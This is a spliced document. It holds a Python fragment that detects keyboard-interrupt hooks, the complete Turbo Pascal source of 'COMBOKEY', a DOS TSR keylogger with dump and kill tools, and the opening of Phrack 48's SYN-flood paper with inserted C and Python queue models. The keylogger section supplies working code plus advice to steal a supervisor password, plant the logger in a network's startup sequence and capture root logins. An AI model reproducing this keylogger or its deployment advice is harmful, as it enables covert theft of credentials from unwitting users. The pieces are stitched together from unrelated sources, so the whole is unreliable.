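def keyboard_hook_findings(ivt, baseline):
    """Return (kind, *details) tuples for the pattern the article describes:
    INT 09h re-pointed away from the clean baseline and INT FFh claimed by
    the same resident code segment.  Keyboard drivers and other TSRs hook
    INT 9 legitimately, which is why the test is a baseline comparison and
    not a bare ROM-or-not test of the vector."""
    findings = []
    seg9, off9 = vector(ivt, 0x09)
    if (seg9, off9) != vector(baseline, 0x09):
        findings.append(("INT09_MOVED", seg9, off9, region(seg9)))
    segff, offff = vector(ivt, 0xFF)
    if (segff, offff) != vector(baseline, 0xFF):
        findings.append(("INTFF_CHANGED", segff, offff))
        if segff == seg9:
            findings.append(("SHARED_SEGMENT", seg9))   # one resident program owns both
    return findings


# Constructed clean baseline: INT 9 in system ROM, INT FFh unused.
CLEAN_IVT = build_ivt({0x09: (0xF000, 0xE987), 0xFF: (0x0000, 0x0000)})
# Constructed snapshot after a hook: both vectors point into one resident RAM segment.
HOOKED_IVT = build_ivt({0x09: (0x1A2B, 0x0120), 0xFF: (0x1A2B, 0x0240)})

if __name__ == "__main__":
    for finding in keyboard_hook_findings(HOOKED_IVT, CLEAN_IVT):
        print(finding)
```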


Look at the "const" section of COMBOKEY and you’ll see a constant array 
of four bytes. Change these numbers to whatever the hell you want. To 
use the COMBOKEY interface you need to send each of these bytes 
sequentially in AX to ISR 255. Look at the "DoCombo" procedure in Dump 
or Kill to see what I mean. 


After you send the combo, you send one more byte that represents the 
command. 


Dump buffer:  AX=C0h  Dumps the buffer to a chunk of memory at ES:DI. 
Get info:     AX=C2h  Sends a TInfoRec (see source) to ES:DI. 
Kill:         AX=C1h  Deactivates the recorder. 

There are two additional programs following: Dump and Kill.  These just 
use the interface to do their appropriate actions. 


THE PROPER ETIQUETTE OF COMBOKEY 

There’s a good deal of social engineering involved with using COMBOKEY. 
Since it works on only the machine you put it on, you have to know where 
to put it in the first place to be most effective. (Or be really 
resourceful and put it on every machine around.) 


To maximize your amusement, get the supervisor password first, and then 
put this program in the startup sequence of the network. Then go nuts. 


This program gets REALLY fun when your net is equipped with TCP/IP apps 
like Telnet, and some moron has their home machine hooked up to the 
Net, and they actually log into it with root from your net. Instant 
party. 


NEAT TRICKS TO TRY 

If I ever get around to it, it’d be cool to use the IPX interface to 
actually broadcast the keystrokes over to a waiting machine for instant 
feedback. 


The next trick to try is to maybe build a hardware version of this with 
a little microcontroller.  A Motorola 68HC11 would do nicely.  This 
would get rid of the pesky problem of resetting the machine or turning 
the power off. 


Ah well. Comments and the like to jsrs@cyberspace.com. Happy hunting. 


{ Source notes: 
  This'll compile on TurboPascal 6 or better.  Might even work with 5. 
  Why Turbo?  Cause it generates damn tight code, and it's much more readable 
  for the newbies than all assembly. } 

{ComboKey - It's a TSR, so we gotta do the mem setup. } 
{$M 1024, 0, 2100} 
program ComboKey; 

uses Dos;  { For Keep() } 

const 
  DUMP_BUFFER   = $C0; 
  KILL_RECORDER = $C1; 
  GET_INFO      = $C2; 

  BUFSIZE     = 2048;  { In bytes, NOT paragraphs! } 
  DISPLAY_MAX = 100; 
  combo: Array[0..3] of Byte = ( 01, 01, 19, 74 ); 

type 
  PBuf = ^TBuf; 
  TBuf = Array[0..BUFSIZE-1] of Byte; 
  PInfoRec = ^TInfoRec; 
  TInfoRec = record 
    buffer_size: Word;  { Word is 16 bit, unsigned } 
    overwrite:   Word;  { Must be in this order! } 
    buffer_ptr:  Word; 
  end; 

var 
  old9o, old9s: Word; 
  wptr:  Word absolute $40:$1c;  { Ptr to next avail slot in kbd buffer } 
  q_top: Word absolute $40:$80; 
  q_bot: Word absolute $40:$82; 
  buffer: PBuf; 
  buf_ptr: Word; 
  overwrite_ctr: Word; 
  last_wptr: Word; 
  tumbler: Byte;  { How many numbers in the combo right so far? } 

procedure SetVector( int: Byte; s, o: Word); 
begin 
  asm 
    push ds 
    cli 
    mov ah, 25h 
    mov al, int 
    mov ds, s 
    mov dx, o 
    int 21h 
    sti 
    pop ds 
  end; 
end; 

procedure NewInt09(Flags, CS, IP, AX, BX, CX, DX, SI, DI, DS, ES, BP: Word); 
  interrupt; 
var 
  offset: Word; 
  c: Byte; 
  l: Word; 
  ctr: Word; 
begin 
  { First call the old handler.  Do the pushf, cause this is an 
    interrupt handler. } 
  asm 
    pushf 
    call dword ptr [old9o]  { Since old9s is next, it works } 
    cli 
  end; 

  { This isn't a press, but a release - ignore it. } 
  if last_wptr = wptr then Exit; 
  last_wptr:=wptr; 

  { Did the queue just wrap? } 
  if (wptr = q_top) then offset:=q_bot-2 
  else offset:=wptr-2; 

  Inc(buf_ptr); 
  if (buf_ptr = BUFSIZE) then begin  { we'd write it, but oh well. } 
    buf_ptr:=0; 
    Inc(overwrite_ctr); 
  end; 
  buffer^[buf_ptr]:=Mem[$40:offset]; 

  asm 
    sti 
  end; 
end; 

{ Here's the interface system.  Don't bother saving the old $FF, 
  cause who uses it anyway?! } 
procedure NewIntFF(Flags, CS, IP, AX, BX, CX, DX, SI, DI, DS, ES, BP: Word); 
  interrupt; 
var 
  command: Word; 
  res, rdi: Word; 
  infoptr: PInfoRec; 
  l: Word; 
begin 
  command:=AX; 
  res:=ES; 
  rdi:=DI; 
  if tumbler=4 then begin  { we have a winner... } 
    tumbler:=0; 
    asm 
      sti 
    end; 
    case command of 
      DUMP_BUFFER: begin 
        asm 
          push ds 
          mov cx, BUFSIZE 
          mov es, [res] 
          mov di, [rdi] 
          mov ax, [WORD PTR buffer+2] 
          mov ds, ax 
          mov ax, [WORD PTR buffer] 
          mov si, ax 
          cld 
          rep movsb 
          pop ds 
        end; 
      end; 
      KILL_RECORDER: begin 
        SetVector(9, old9s, old9o); 
      end; 
      GET_INFO: begin 
        asm 
          mov es, [res] 
          mov di, [rdi] 
          mov ax, BUFSIZE 
          mov es:[di], ax 
          mov ax, [overwrite_ctr] 
          mov es:[di+2], ax 
          mov ax, [buf_ptr] 
          mov es:[di+4], ax 
        end; 
      end; 
    end; 
    asm 
      cli 
    end; 
  end; 
  if command=combo[tumbler] then Inc(tumbler) 
  else tumbler:=0; 
end; 

begin 
  asm 
    mov ah, $35 
    mov al, 9 
    int $21 
    mov ax, es 
    mov old9s, ax 
    mov old9o, bx 
  end; 

  SetVector(9, Seg(NewInt09), Ofs(NewInt09)); 
  SetVector(255, Seg(NewIntFF), Ofs(NewIntFF)); 

  buffer:=New(PBuf); 
  buf_ptr:=0; 
  overwrite_ctr:=0; 
  last_wptr:=0; 
  tumbler:=0; 

  Keep(0); 
end. 


{ Kills the keyrecorder } 
program Kill; 

const 
  combo0 = 01; 
  combo1 = 01; 
  combo2 = 19; 
  combo3 = 74; 

  KILL_RECORDER = $C1; 

procedure ResetCombo; 
var 
  l: Word; 
begin 
  for l:=1 to 4 do asm 
    mov ax, 0 
    int $ff 
  end; 
end; 

procedure DoCombo; 
begin 
  asm 
    mov ax, combo0 
    int $ff 
    mov ax, combo1 
    int $ff 
    mov ax, combo2 
    int $ff 
    mov ax, combo3 
    int $ff 
  end; 
end; 

begin 
  ResetCombo; 
  DoCombo; 
  asm 
    mov ax, KILL_RECORDER 
    int $ff 
  end; 
end. 

{ Syntax: DUMP DESTFILE. 
  This'll dump the buffer information and contents to the file.  If 
  no file is given, it goes to the screen. } 
program Dump; 

const 
  combo0 = 01; 
  combo1 = 01; 
  combo2 = 19; 
  combo3 = 74; 

  DUMP_BUFFER = $C0; 
  GET_INFO    = $C2; 

type 
  PInfoRec = ^TInfoRec; 
  TInfoRec = record 
    buffer_size: Word; 
    overwrite:   Word; 
    buffer_ptr:  Word; 
  end; 

var 
  info: TInfoRec; 
  buffer: Array[0..8191] of Byte; 
  l: Word; 
  f: Text; 

procedure ResetCombo; 
var 
  l: Word; 
begin 
  for l:=1 to 4 do asm 
    mov ax, 0 
    int $ff 
  end; 
end; 

procedure DoCombo; 
begin 
  asm 
    mov ax, combo0 
    int $ff 
    mov ax, combo1 
    int $ff 
    mov ax, combo2 
    int $ff 
    mov ax, combo3 
    int $ff 
  end; 
end; 

begin 
  Assign(f, ParamStr(1)); 
  Rewrite(f); 

  ResetCombo; 
  DoCombo; 
  asm 
    mov ax, SEG info 
    mov es, ax 
    mov di, OFFSET info 
    mov ax, GET_INFO 
    int $ff 
  end; 

  writeln(f,'Buffer size: ',info.buffer_size); 
  writeln(f,'Buffer ptr: ',info.buffer_ptr); 
  writeln(f,'Overwrite: ',info.overwrite); 

  DoCombo; 
  asm 
    mov ax, SEG buffer 
    mov es, ax 
    mov di, OFFSET buffer 
    mov ax, DUMP_BUFFER 
    int $ff 
  end; 

  for l:=0 to info.buffer_ptr do begin 
    write(f, Char(buffer[l])); 
    if buffer[l] = 13 then write(f, #10); 
  end; 

  Close(f); 
end. 
==Phrack Magazine== 


Volume Seven, Issue Forty-Eight, File 13 of 18 


[ Project Neptune ] 


by daemon9 / route / infinity 
for Phrack Magazine 
July 1996 Guild Productions, kid 


comments to route@infonexus.com 


This project is a comprehensive analysis of TCP SYN flooding.  You 
may be wondering, why such a copious treatment of TCP SYN flooding? 
Apparently, someone had to do it.  That someone turned out to be me (I need 
a real hobby).  The SYNflood Project consists of this whitepaper, including 
annotated network monitor dumps and fully functional robust Linux source code. 


--[ Introduction ]-- 


TCP SYN flooding is a denial of service (DOS) attack.  Like most DOS 
attacks, it does not exploit a software bug, but rather a shortcoming in the 
implementation of a particular protocol.  For example, mail bombing DOS attacks 
work because most SMTP agents are dumb and will accept whatever is sent their 
way.  ICMP_ECHO floods exploit the fact that most kernels will simply reply to 
ICMP_ECHO request packets one after another, ad infinitum.  We will see that 
TCP SYN flood DOS attacks work because of the current implementation of TCP's 
connection establishment protocol. 


--[ Overview ]-- 


This whitepaper is intended as a complete introduction to TCP SYN 
flooding (referred to hereafter as SYN flooding).  It will cover the attack 
in detail, including all relevant necessary background information.  It is 
organized into sections: 


Section I.    TCP Background Information 
Section II.   TCP Memory Structures and the Backlog 
Section III.  TCP Input Processing 
Section IV.   The Attack 
Section V.    Network Trace 
Section VI.   Neptune.c 
Section VII.  Discussion and Prevention 
Section VIII. References 


(Note that readers unfamiliar with the TCP/IP protocol suite may wish to first 
read ftp://ftp.infonexus.com/pub/Philes/NetTech/TCP-IP/tcipIp.intro.txt.gz) 


--[ The Players ]-- 


A:    Target host 
X:    Unreachable host 
Z:    Attacking host 
Z(x): Attacker masquerading as the unreachable host 


--[ The Figures ]-- 


There are a few network transaction figures in the paper and 
they are to be interpreted as per the following example: 

tick    host a    control    host b 

tick: 
        A unit of time.  There is no distinction made as to *how* much time 
passes between ticks, just that time passes.  It's generally not going to be 
a great deal. 
host a: 
        A machine participating in a TCP-based conversation. 
control: 
        This field shows any relevant control bits set in the TCP header and 
the direction the data is flowing. 
host b: 
        A machine participating in a TCP-based conversation. 

For example: 
1       A       ---SYN--->      B 

In this case, at the first referenced point in time, host a is sending 
a TCP segment to host b with the SYN bit on.  Unless stated, we are generally 
not concerned with the data portion of the TCP segment. 


Section I.  TCP Background Information 


TCP is a connection-oriented, reliable transport protocol.  TCP is 
responsible for hiding network intricacies from the upper layers.  A 
connection-oriented protocol implies that the two hosts participating in a 
discussion must first establish a connection before data may be exchanged.  In 
TCP's case, this is done with the three-way handshake.  Reliability can be 
provided in a number of ways, but the only two we are concerned with are data 
sequencing and acknowledgement.  TCP assigns sequence numbers to every byte in 
every segment and acknowledges all data bytes received from the other end. 
(ACK's consume a sequence number, but are not themselves ACK'd.  That would be 
ludicrous.) 


--[ TCP Connection Establishment ]-- 


In order to exchange data using TCP, hosts must establish a connection. 
TCP establishes a connection in a 3 step process called the 3-way handshake. 
If machine A is running a client program and wishes to connect to a server 
program on machine B, the process is as follows: 

fig (1) 
1       A       ---SYN--->      B 
2       A       <---SYN/ACK---  B 
3       A       ---ACK--->      B 

At (1) the client is telling the server that it wants a connection. 
This is the SYN flag's only purpose.  The client is telling the server that 
the sequence number field is valid, and should be checked.  The client will 
set the sequence number field in the TCP header to its ISN (initial sequence 
number).  The server, upon receiving this segment (2) will respond with its 
own ISN (therefore the SYN flag is on) and an ACKnowledgement of the client's 
first segment (which is the client's ISN+1).  The client then ACK's the 
server's ISN (3).  Now data transfer may take place. 
--[ TCP Control Flags ]-- 


There are six TCP control flags.  We are only concerned with 3, but 
the others are included for posterity: 

* SYN: Synchronize Sequence Numbers 
        The synchronize sequence numbers field is valid.  This flag is only 
valid during the 3-way handshake.  It tells the receiving TCP to check the 
sequence number field, and note its value as the connection-initiator's 
(usually the client) initial sequence number.  TCP sequence numbers can 
simply be thought of as 32-bit counters.  They range from 0 to 4,294,967,295. 
Every byte of data exchanged across a TCP connection (along with certain 
flags) is sequenced.  The sequence number field in the TCP header will contain 
the sequence number of the *first* byte of data in the TCP segment. 

* ACK: Acknowledgement 
        The acknowledgement number field is valid.  This flag is almost always 
set.  The acknowledgement number field in the TCP header holds the value of 
the next *expected* sequence number (from the other side), and also 
acknowledges *all* data (from the other side) up through this ACK number minus 
one. 

* RST: Reset 
        Destroy the referenced connection.  All memory structures are torn 
down. 

* URG: Urgent 
        The urgent pointer is valid.  This is TCP's way of implementing out 
of band (OOB) data.  For instance, in a telnet connection a 'ctrl-c' on the 
client side is considered urgent and will cause this flag to be set. 

* PSH: Push 
        The receiving TCP should not queue this data, but rather pass it to 
the application as soon as possible.  This flag should always be set in 
interactive connections, such as telnet and rlogin. 

* FIN: Finish 
        The sending TCP is finished transmitting data, but is still open to 
accepting data. 


--[ Ports ]-- 


To grant simultaneous access to the TCP module, TCP provides a user 
interface called a port.  Ports are used by the kernel to identify network 
processes.  They are strictly transport layer entities.  Together with an 
IP address, a TCP port provides an endpoint for network 
communications.  In fact, at any given moment *all* Internet connections can 
be described by 4 numbers: the source IP address and source port and the 
destination IP address and destination port.  Servers are bound to 
'well-known' ports so that they may be located on a standard port on 
different systems.  For example, the telnet daemon sits on TCP port 23. 


Section II.  TCP Memory Structures and the Backlog 


For a copious treatment of the topic of SYN flooding, it is necessary 
to look at the memory structures that TCP creates when a client SYN arrives 
and the connection is pending (that is, a connection that is somewhere in 
the process of the three-way handshake and TCP is in the SYN_SENT or 
SYN_RCVD state). 
--[ BSD ]-- 


Under BSD style network code, for any given pending TCP connection 
there are three memory structures that are allocated (we do not discuss the 
process (proc) structure and file structure, but the reader should be aware 
that they exist as well.): 


Socket Structure (socket{}): 

Holds the information related to the local end of the communications 
link: protocol used, state information, addressing information, connection 
queues, buffers, and flags. 


Internet Protocol Control Block Structure (inpcb{}): 

PCB's are used at the transport layer by TCP (and UDP) to hold various 
pieces of information needed by TCP.  They hold: TCP state information, IP 
address information, port numbers, IP header prototype and options and a 
pointer to the routing table entry for the destination address.  PCB's are 
created for a given TCP based server when the server calls listen(). 


TCP Control Block Structure (tcpcb{}): 
The TCP control block contains TCP specific information such as timer 
information, sequence number information, flow control status, and OOB data. 


--[ Linux ]-- 


Linux uses a different scheme of memory allocation to hold network 
information. The socket structure is still used, but instead of the pcb{} 
and tcpcb{}, we have: 


Sock Structure (sock{}): 

Protocol specific information, most of the data structures are TCP 
related. This is a huge structure. 
SK Structure (sk_buff{}): 

Holds more protocol specific information including packet header 
information, also contains a sock{}. 


According to Alan Cox: 

The inode is the inode holding the socket (this may be a dummy inode 
for non file system sockets like IP), the socket holds generic high level 
methods and the struct sock is the protocol specific object, although all but 
a few experimental high performance items use the same generic struct sock and 
support code. That holds chains of linear buffers (struct sk_buff’s). 


[ struct inode -> struct socket -> struct sock -> chains of sk_buff’s ] 


--[ The Backlog Queue ]-- 


These are large memory structures.  Every time a client SYN arrives 
on a valid port (a port where a TCP server is listen()ing), they must be 
allocated.  If there were no limit, a busy host could easily exhaust all of 
its memory just trying to process TCP connections.  (This would be an even 
simpler DOS attack.)  However, there is an upper limit to the amount of 
concurrent connection requests a given TCP can have outstanding for a 
given socket.  This limit is the backlog and it is the length of the queue 
where incoming (as yet incomplete) connections are kept.  This queue limit 
applies to both the number of incomplete connections (the 3-way handshake has 
not been completed) and the number of completed connections that have not 
been pulled from the queue by the application by way of the accept() call. 
If this backlog limit is reached, we will see that TCP will silently 
discard all incoming connection requests until the pending connections can 
be dealt with. 
The backlog is not a large value.  It does not have to be.  Normally 
TCP is quite expedient in connection establishment processing.  Even if a 
connection arrived while the queue was full, in all likelihood, when the 
client retransmits its connection request segment, the receiving TCP will 
have room again in its queue.  Different TCP implementations have different 
backlog sizes.  Under BSD style networking code, there is also a 'grace' margin 
of 3/2.  That is, TCP will allow up to backlog*3/2+1 connections.  This will 
allow a socket one connection even if it calls listen with a backlog of 0. 
Some common backlog values: 

fig (2) 

OS              Backlog   BL+Grace   Notes 
SunOS 4.x.x        5         8 
IRIX 5.2           5         8 
Solaris 
Linux 1.2.x       10        10       Linux does not have this grace margin. 
FreeBSD 2.1.0     32 
FreeBSD 2.1.5    128 
Win NTs 3.5.1      6         6       NT does not appear to have this margin. 
Win NTw 4.0        6         6       NT has a pathetic backlog. 
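
A small model of the server side, as an added example that is not neptune.c or any code from the paper: it applies the backlog*3/2+1 grace arithmetic of fig (2), the 75 second connection-establishment timer, and the LISTEN-state checks that Section III walks through, and assumes accept() drains completed connections immediately so that only half-open (SYN_RCVD) entries occupy the queue.

```python
"""Model of a listening TCP's backlog queue under a SYN flood.

Added example for this page, not code from the paper.  Assumptions: the
application accept()s completed connections at once, so only half-open
entries hold queue slots; retransmitted SYNs for an existing entry are not
modelled beyond being dropped.  Times are in seconds.
"""

SYN, ACK, RST = "SYN", "ACK", "RST"
CONN_EST_TIMEOUT = 75        # connection-establishment timer, set when the SYN is ACKed


def backlog_limit(backlog, bsd_grace=True):
    """BSD allows backlog*3/2+1 pending connections; Linux 1.2.x uses backlog as-is."""
    return backlog * 3 // 2 + 1 if bsd_grace else backlog


class ListenSocket:
    def __init__(self, backlog, bsd_grace=True):
        self.limit = backlog_limit(backlog, bsd_grace)
        self.pending = {}        # (src_addr, src_port) -> deadline of the SYN_RCVD entry
        self.established = []    # handshakes completed by the client's ACK
        self.dropped_full = 0    # SYNs silently discarded because the queue was full
        self.rst_sent = 0

    def _expire(self, now):
        # Half-open entries whose SYN/ACK was never answered are torn down
        # when the 75 second timer fires; this is what frees a slot during a flood.
        for key, deadline in list(self.pending.items()):
            if deadline <= now:
                del self.pending[key]

    def segment(self, now, src, flags):
        """Process one segment arriving on the listening port; returns what TCP did."""
        self._expire(now)
        if src in self.pending:
            if RST in flags:
                del self.pending[src]          # RST tears the half-open entry down
                return "reset"
            if ACK in flags and SYN not in flags:
                del self.pending[src]          # step 3 of fig (1): handshake complete
                self.established.append(src)
                return "established"
            return "dropped"                   # retransmitted SYN etc., not modelled further
        # No entry for this 4-tuple: processing happens in the LISTEN state.
        if RST in flags:
            return "dropped"                   # RST is dropped silently
        if ACK in flags:
            self.rst_sent += 1                 # ACK makes no sense here: drop and send RST
            return "rst"
        if SYN not in flags:
            return "dropped"
        if len(self.pending) >= self.limit:
            self.dropped_full += 1             # backlog reached: refused without any reply
            return "dropped_backlog_full"
        self.pending[src] = now + CONN_EST_TIMEOUT
        return "syn_ack_sent"                  # state is now SYN_RCVD, timer running


def flood_scenario(backlog=5):
    """SYNs whose source is the unreachable host X never get step 3, so they hold
    the queue until the timer frees them; the real client A is shut out meanwhile."""
    srv = ListenSocket(backlog)
    spoofed = [srv.segment(0, ("X", 1000 + i), {SYN}) for i in range(srv.limit)]
    blocked = srv.segment(1, ("A", 4000), {SYN})          # silently discarded
    still_blocked = srv.segment(74, ("A", 4000), {SYN})   # timer has not fired yet
    recovered = srv.segment(76, ("A", 4000), {SYN})       # X's entries expired at t=75
    done = srv.segment(77, ("A", 4000), {ACK})
    return {
        "limit": srv.limit,
        "syn_acks_to_x": spoofed.count("syn_ack_sent"),
        "blocked": blocked,
        "still_blocked": still_blocked,
        "recovered": recovered,
        "done": done,
        "dropped_full": srv.dropped_full,
    }


if __name__ == "__main__":
    for k, v in flood_scenario().items():
        print("%-14s %s" % (k, v))
```

With a SunOS-style backlog of 5 the queue holds 8 half-open entries, so 8 unanswered SYNs are enough to make the listener drop every further connection request until the timer expires.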
Section III. TCP Input Processing 


To see exactly where the attack works it is necessary to watch as 
the receiving TCP processes an incoming segment. The following is true for 
BSD style networking, and only processes relevant to this paper are 
discussed. 


A packet arrives and is demultiplexed up the protocol stack to TCP. The TCP 
state is LISTEN: 


Get header information: 

TCP retrieves the TCP and IP headers and stores the information in 
memory. 
Verify the TCP checksum: 

The standard Internet checksum is applied to the segment. If it
fails, no ACK is sent, and the segment is dropped, on the assumption that the
client will retransmit it.

Locate the PCB{}: 

TCP locates the pcb{} associated with the connection. If it is not
found, TCP drops the segment and sends a RST. (Aside: this is how TCP
handles connections that arrive on ports with no server listen()ing.) If
the pcb{} exists, but the state is CLOSED, the server has not called
connect() or listen(). The segment is dropped, but no RST is sent. The
client is expected to retransmit its connection request. We will see this
occurrence when we discuss the 'Linux Anomaly'.

Create new socket: 

When a segment arrives for a listen()ing socket, a slave socket is 
created. This is where a socket{}, tcpcb{}, and another pcb{} are created. 
TCP is not committed to the connection at this point, so a flag is set to 
cause TCP to drop the socket (and destroy the memory structures) if an 
error is encountered. If the backlog limit is reached, TCP considers this 
an error, and the connection is refused. We will see that this is exactly 
why the attack works. Otherwise, the new socket’s TCP state is LISTEN, and 
the completion of the passive open is attempted. 

Drop if RST, ACK, or no SYN: 

If the segment contains a RST, it is dropped. If it contains an 
ACK, it is dropped, a RST is sent and the memory structures torn down (the 
ACK makes no sense for the connection at this point, and is considered an 
error). If the segment does not have the SYN bit on, it is dropped. If 
the segment contains a SYN, processing continues. 

Address processing, etc:

TCP then copies the client's address information into a buffer and
connects its pcb{} to the client, processes any TCP options, and
initializes its initial send sequence (ISS) number.

ACK the SYN: 

TCP sends a SYN, ISS and an ACK to the client. The connection
establishment timer is set for 75 seconds at this point. The state changes
to SYN_RCVD. Now TCP is committed to the socket. We will see that this
is the state the target TCP will be in when in the throes of the attack,
because the expected client response is never received. The state remains
SYN_RCVD until the connection establishment timer expires, in which case all
the memory structures associated with the connection are destroyed, and the
socket returns to the LISTEN state.


Section IV. The Attack 


A TCP connection is initiated with a client issuing a request to a
server with the SYN flag on in the TCP header. Normally the server will
issue a SYN/ACK back to the client identified by the 32-bit source address in
the IP header. The client will then send an ACK to the server (as we
saw in figure 1 above) and data transfer can commence. When the client IP
address is spoofed to be that of an unreachable host, however, the targeted
TCP cannot complete the 3-way handshake and will keep trying until it times
out. That is the basis for the attack.

The attacking host sends a few (we saw that as little as 6 is
enough) SYN requests to the target TCP port (for example, the telnet daemon).
The attacking host also must make sure that the source IP address is spoofed
to be that of another, currently unreachable host (the target TCP will be
sending its response to this address). IP (by way of ICMP) will inform TCP
that the host is unreachable, but TCP considers these errors to be transient
and leaves the resolution of them up to IP (reroute the packets, etc.),
effectively ignoring them. The IP address must be unreachable because the
attacker does not want *any* host to receive the SYN/ACKs that will be coming
from the target TCP, which would elicit a RST from that host (as we saw in
TCP input above). This would foil the attack. The process is as follows:

fig (3)

    1   Z(x) ---SYN---> A
        Z(x) ---SYN---> A
        Z(x) ---SYN---> A
        Z(x) ---SYN---> A
        Z(x) ---SYN---> A
        Z(x) ---SYN---> A

    2   X <---SYN/ACK--- A
        X <---SYN/ACK--- A

    3   X <---RST--- A


At (1) the attacking host sends a multitude of SYN requests to the target
to fill its backlog queue with pending connections. (2) The target responds
with SYN/ACKs to what it believes is the source of the incoming SYNs. During
this time all further requests to this TCP port will be ignored. The target
port is flooded.

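To make the queue arithmetic of Section II, the LISTEN-state processing of
Section III and the flood just described concrete, here is a small model of a
BSD-style listening socket. It is an added example for this article, not part
of Neptune and not code from the original page; it sends nothing on the wire.
The backlog*3/2+1 grace margin, the 75 second connection-establishment timer
and the RST/ACK/SYN handling are as the text describes them; the slot array
size MAX_SLOTS, the address constants and the two demo helpers are this
model's own assumptions.

```c
/* listenq.c: model of a BSD-style listen queue under a SYN flood.
   Added example, not part of Neptune. */
#include <stdio.h>
#include <string.h>

#define CONN_TIMER 75                 /* connection-establishment timer, seconds (from the text) */
#define MAX_SLOTS  256                /* assumption of this model, not a kernel constant */

enum tstate { SLOT_FREE = 0, SYN_RCVD };

struct slot { enum tstate state; unsigned peer; long expires; };

struct listener {
    int backlog;                      /* argument given to listen() */
    int bsd_grace;                    /* 1: BSD 3/2+1 margin, 0: Linux 1.2.x / NT */
    struct slot q[MAX_SLOTS];
};

void listener_init(struct listener *l, int backlog, int bsd_grace) {
    memset(l, 0, sizeof *l);
    l->backlog = backlog;
    l->bsd_grace = bsd_grace;
}

/* Pending connections TCP will hold for this socket before refusing more. */
int listener_limit(const struct listener *l) {
    return l->bsd_grace ? l->backlog * 3 / 2 + 1 : l->backlog;
}

int listener_pending(const struct listener *l) {
    int i, n = 0;
    for (i = 0; i < MAX_SLOTS; i++) if (l->q[i].state == SYN_RCVD) n++;
    return n;
}

/* Connection-establishment timer: the only way a half-open connection to an
   unreachable host ever leaves the queue. */
void listener_tick(struct listener *l, long now) {
    int i;
    for (i = 0; i < MAX_SLOTS; i++)
        if (l->q[i].state == SYN_RCVD && l->q[i].expires <= now)
            l->q[i].state = SLOT_FREE;
}

/* One segment arrives for the socket in LISTEN. Returns what TCP sends back:
   "SYN/ACK", "RST", or "DROP" for a silent discard. */
const char *listener_input(struct listener *l, long now, unsigned src,
                           int syn, int ack, int rst) {
    int i;
    listener_tick(l, now);
    if (rst) return "DROP";                          /* RST in LISTEN: dropped */
    if (ack) return "RST";                           /* ACK makes no sense yet */
    if (!syn) return "DROP";
    if (listener_pending(l) >= listener_limit(l))
        return "DROP";                               /* backlog full: refused silently */
    for (i = 0; i < MAX_SLOTS; i++)
        if (l->q[i].state == SLOT_FREE) {
            l->q[i].state = SYN_RCVD;                /* slave socket; TCP is now committed */
            l->q[i].peer = src;
            l->q[i].expires = now + CONN_TIMER;
            return "SYN/ACK";
        }
    return "DROP";
}

/* nsyn spoofed SYNs from unreachable host X arrive at t=0, then one SYN from
   a real client C at t_client. Returns how many spoofed SYNs were queued;
   *client_ok tells whether C got a SYN/ACK. Addresses are constructed. */
static int run_flood(int backlog, int bsd_grace, int nsyn, long t_client, int *client_ok) {
    const unsigned X = 0xC0A8020Au, C = 0xC0A80202u;   /* 192.168.2.10, 192.168.2.2 */
    struct listener l;
    int i, queued = 0;
    listener_init(&l, backlog, bsd_grace);
    for (i = 0; i < nsyn; i++)
        if (!strcmp(listener_input(&l, 0, X, 1, 0, 0), "SYN/ACK")) queued++;
    *client_ok = !strcmp(listener_input(&l, t_client, C, 1, 0, 0), "SYN/ACK");
    return queued;
}

int flood_queued(int backlog, int bsd_grace, int nsyn) {
    int ok; return run_flood(backlog, bsd_grace, nsyn, 10, &ok);
}

int client_served(int backlog, int bsd_grace, int nsyn, long t_client) {
    int ok; run_flood(backlog, bsd_grace, nsyn, t_client, &ok); return ok;
}

int main(void) {
    printf("backlog 5 + grace (SunOS): %d of 10 SYNs queued; client at 10s: %s, at 76s: %s\n",
           flood_queued(5, 1, 10), client_served(5, 1, 10, 10) ? "SYN/ACK" : "dropped",
           client_served(5, 1, 10, 76) ? "SYN/ACK" : "dropped");
    printf("backlog 10, no grace (Linux 1.2): %d of 10 SYNs queued; client at 10s: %s\n",
           flood_queued(10, 0, 10), client_served(10, 0, 10, 10) ? "SYN/ACK" : "dropped");
    return 0;
}
```

With backlog 5 and the BSD margin the model queues 8 of the 10 spoofed SYNs,
drops the real client's SYN while they sit in SYN_RCVD, and serves it again
once the 75 second timer has fired; with backlog 0 it still queues exactly one.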
--[ Linux Anomaly ]--


In doing my research for this project, I noticed a very strange
implementation error in the TCP module of Linux. When a particular TCP
server is flooded on a Linux host, strange things are afoot... First, it
appears that the connection-establishment timer is broken. The 10 spoofed
connection-requests keep the sockets in the SYN_RCVD state for just
over 20 minutes (23 minutes to be exact. Wonder what the significance of
this is... Hmmm...). Much longer than the 75 seconds it *should* be. The
next oddity is even more odd... After that seemingly arbitrary time period
(I have yet to determine what the hell is going on there), TCP moves the
flooded sockets into the CLOSE state, where they *stay* until a
connection-request arrives on a *different* port. If a connection-request
arrives on the flooded port (now in the CLOSE state), it will not answer,
acting as if it is still flooded. After the connection-request arrives on a
different port, the CLOSEd sockets will be destroyed, and the original
flooded port will be free to answer requests again. It seems as though the
connection-request will spark the CLOSEd sockets into calling listen()...
Damn weird if you ask me...


The implications of this are severe. I have been able to completely
disable all TCP based servers from answering requests indefinitely. If all
the TCP servers are flooded, there are none to receive the valid connection
request to alleviate the CLOSE state from the flooded connections. Bad
news indeed.

[Note: as of 7.15.96 this is a conundrum. I have contacted Alan
Cox and Eric Schenk and plan to work with them on a solution to this
problem. I will be forthcoming with all our findings as soon as possible. I
believe the problem to perhaps lie (at least in part) in the
tcp_close_pending() function... Or perhaps there is a logic error in how
TCP switches between the connection-establishment timer and the
keep-alive timer. They are both implemented using the same variable since
they are mutually exclusive...]


Section V. Network Trace 


The following is a network trace from an actual SYN flooding session. 
The target machine is Ash, a Linux 1.2.13 box. The attacker is Onyx. The 
network is a 10Mbps ethernet. 


Network Monitor trace Fri 07/12/96 10:23:34 Flood1.TXT


Frame  Time    Src   Dst   Protocol  Description
                                     (flags, len, seq, ack, win, src address -> dst address)

1      2.519   onyx  ash   TCP/23    ....S., len: 4, seq:3580643269, ack:1380647758,
                                     win: 512, 192.168.2.2 -> 192.168.2.7 IP
2      2.520   ash   onyx  TCP/1510  .A..S., len: 4, seq: 659642873, ack:3580643270,
                                     win:14335, 192.168.2.7 -> 192.168.2.2 IP
3      2.520   onyx  ash   TCP/23    .A...., len: 0, seq:3580643270, ack: 659642874,
                                     win:14260, 192.168.2.2 -> 192.168.2.7 IP

A telnet client is started on Onyx, and we see the standard 3-way
handshake between the two hosts for the telnet session.

